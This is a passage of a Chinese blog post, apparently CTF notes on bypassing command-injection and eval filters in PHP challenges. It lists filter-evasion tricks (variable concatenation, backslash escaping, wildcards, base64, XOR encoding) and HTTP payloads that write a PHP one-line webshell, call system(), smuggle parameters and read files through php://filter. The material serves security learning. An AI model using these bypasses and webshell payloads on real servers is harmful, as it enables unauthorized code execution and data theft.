<p>（2）{}绕过</p>
<p><del>（3）${IFS}绕过</del></p>
<p>（4）&lt;绕过：cat&lt;flag.php</p>
<h2 id="2、绕过过滤关键字方法"><a href="#2、绕过过滤关键字方法" class="headerlink" title="2、绕过过滤关键字方法"></a>2、绕过过滤关键字方法</h2><p>（1）变量拼接</p>
<pre><code class="shell">a=c;b=at;$a$b flag.php
</code></pre>
<p>（2）空变量绕过</p>
<pre><code class="shell">ca&#123;x&#125;t flag.php
</code></pre>
<p>（3）\绕过</p>
<pre><code class="shell">c\a\t flag.php
</code></pre>
<p>（4）通配符绕过</p>
<pre><code class="shell">cat flag.*
</code></pre>
<p>（5）base64绕过</p>
<pre><code class="shell">echo &quot;Y2F0IGZsYWcucGhw&quot;|base64 -d
</code></pre>
<p>cat flag.php</p>
<h2 id="3、常见关键字替换"><a href="#3、常见关键字替换" class="headerlink" title="3、常见关键字替换"></a>3、常见关键字替换</h2><p>（1）cat命令</p>
<ul>
<li><p>tac flag</p>
</li>
<li><p>c\a\t flag</p>
</li>
<li><p>echo Y2F0IGZsYWcucGhwCg&#x3D;&#x3D;|base64 -d</p>
</li>
<li><p>nl flag.php</p>
</li>
<li><p>more</p>
</li>
<li><p>less</p>
</li>
<li><p>nl：用来计算文件中的行号，可以理解为cat -n；但是实际上不一样</p>
</li>
<li><p>uniq：检查以及删除文本文件中重复出现的行列，然后打印出结果</p>
</li>
<li><p>sort：根据每行的首字母的顺序进行排序，打印出结果</p>
</li>
<li><p>tail</p>
</li>
</ul>
<p>（2）system函数</p>
<ul>
<li>exec</li>
<li>反引号</li>
<li>shell_exec</li>
</ul>
<h2 id="4、过滤括号（文件包含绕过）"><a href="#4、过滤括号（文件包含绕过）" class="headerlink" title="4、过滤括号（文件包含绕过）"></a>4、过滤括号（文件包含绕过）</h2><p>（1）常见的题型</p>
<pre><code class="php">&lt;?php

error_reporting(0);
if(isset($_GET[&#39;c&#39;]))&#123;
    $c = $_GET[&#39;c&#39;];
    if(!preg_match(&quot;/flag|system|php|cat|sort|shell|\.| |\&#39;|\`|echo|\;|\(|\:|\&quot;|\&lt;|\=/i&quot;, $c))&#123;
        eval($c);
    &#125;
    
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>（2）一般是上面的这类题，使用的代码执行（eval函数等），过滤掉了括号，而eval函数一般使用等等方式有</p>
<p>① 写一句话木马上去</p>
<pre><code class="http">?c=file_put_contents(&quot;hack.php&quot;, &quot;&lt;?ph eval(\$_POST[1]);?&gt;&quot;);
</code></pre>
<pre><code class="http">?C=echo &quot;&lt;?ph eval(\$_POST[1]);?&gt;&quot; &gt; &quot;hack.php&quot; ;
</code></pre>
<p>② 利用system函数执行系统指令以实现绕过 </p>
<pre><code class="http">?c=system(&quot;cat flag.php&quot;);
</code></pre>
<p>③ 使用参数逃逸的方式进行</p>
<pre><code class="http">?c=eval($_GET[1]);&amp;1=system(&quot;cat flag.php&quot;)
</code></pre>
<blockquote>
<p>上面的所有情况基本上都是涉及到括号的，这是因为基本上都调用了函数，这主要的原因是php中直接代码getshell的只有一句话木马（我知道的），phpinfo只能是一种测试，本身用处不大。唯一那种木马的绕过方式一旦尖括号被过滤就没有任何办法，所以采取发方式就是文件包含的方式 + 参数逃逸，这个主要的原因是这有这两个函数能在没有括号的时候能获取到文件里面的内容</p>
</blockquote>
<pre><code class="http">?c=include $_GET[1];&amp;1=php://filter/convert.base64-encode/resource=flag.php
</code></pre>
<h2 id="5、关键字及其子关键字过滤"><a href="#5、关键字及其子关键字过滤" class="headerlink" title="5、关键字及其子关键字过滤"></a>5、关键字及其子关键字过滤</h2><blockquote>
<p>这种题型适合与关键的命令被过滤掉，此时我们就可以根据系统存放命令的地方结合通配符进行使用</p>
</blockquote>
<p>（1）获取基本命令关键字</p>
<p>在Linux根目录下存在一个bin目录，它的作用就是用来存放系统的所有用户使用的指令。当然肯定会包括cat这些命令</p>
<p>此时再结合通配符，实现命令绕过</p>
<ul>
<li>&#x2F;bin&#x2F;ca?</li>
</ul>
<p>当然这种方式肯定是有局限性的，这种方式的主要问题在于你使用的通配符后，对应产生的命令有多条，而他会优先考虑前面的命令，经过在我Ubuntu下面的测试发现下面的指令的是唯一的</p>
<p><img src="/img/image-20220723102008656.png" alt="image-20220723102008656"></p>
<p>（2）过滤掉字母</p>
<p>Linux下面还会存在一个base64的指令，根据通配符匹配后执行的优先级，它会优先执行base64。当然并不是每种环境下面都会存在这个命令，这只是一种方式</p>
<p><img src="/img/image-20220723101754311.png" alt="image-20220723101754311"></p>
<p>payload：直接读取flag.php，这种文件名占八位的所有文件的内容，并以十六进制的形式展示出来</p>
<pre><code class="http">?c=/???/????64 ????????
</code></pre>
<h2 id="6、过滤数字以及字母"><a href="#6、过滤数字以及字母" class="headerlink" title="6、过滤数字以及字母"></a>6、过滤数字以及字母</h2><p>（1）异或</p>
<ul>
<li><p>‘a’^’&lt;’    &#x3D;&#x3D;》 [</p>
</li>
<li><p>‘]’^’&lt;’     &#x3D;&#x3D;》 a</p>
</li>
<li><p>取反</p>
</li>
<li><p>自增</p>
</li>
</ul>
<h2 id="7、如何实现上传一句话木马"><a href="#7、如何实现上传一句话木马" class="headerlink" title="7、如何实现上传一句话木马"></a>7、如何实现上传一句话木马</h2><p>（1）使用echo语句直接写入</p>
<pre><code class="http">?C=echo &quot;&lt;?ph eval(\$_POST[1]);?&gt;&quot; &gt; &quot;hack.php&quot; ;
</code></pre>
<p>（2）使用file_put_contents函数写入</p>
<pre><code class="http">?c=file_put_contents(&quot;hack.php&quot;, &quot;&lt;?ph eval(\$_POST[1]);?&gt;&quot;);
</code></pre>
<h2 id="7、disable-function"><a href="#7、disable-function" class="headerlink" title="7、disable_function"></a>7、disable_function</h2><h2 id="8、过滤-lt"><a href="#8、过滤-lt" class="headerlink" title="8、过滤&lt;"></a>8、过滤&lt;</h2><ul>
<li><p>过滤掉以后，无法实现一句话木马</p>
</li>
<li><p>无法实现</p>
</li>
</ul>
<h2 id="9、常见的小技巧"><a href="#9、常见的小技巧" class="headerlink" title="9、常见的小技巧"></a>9、常见的小技巧</h2><ul>
<li>短标签替换</li>
<li>；  &#x3D;&#x3D;》 ?&gt;</li>
</ul>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮箱至 1627319559@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="//cdn.jsdelivr.net/npm/mathjax@2.7.8/unpacked/MathJax.js?config=TeX-MML-AM_CHTML">
</script>
<input type="hidden" id="MathJax-js"
        value="//cdn.jsdelivr.net/npm/mathjax@2.7.8/unpacked/MathJax.js?config=TeX-MML-AM_CHTML">
</input>
    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2017 swedsn
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 572px;
    }
    .nav.fullscreen {
        margin-left: -572px;
    }
    .nav-left {
        width: 150px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 512px;
        }
        .nav.fullscreen {
            margin-left: -512px;
        }
        .nav-left {
            width: 120px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 512px;
            margin-left: -512px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #FFE7BA;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://browser9.qhimg.com/bdm/1000_618_85/t0183def7a3a7924215.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
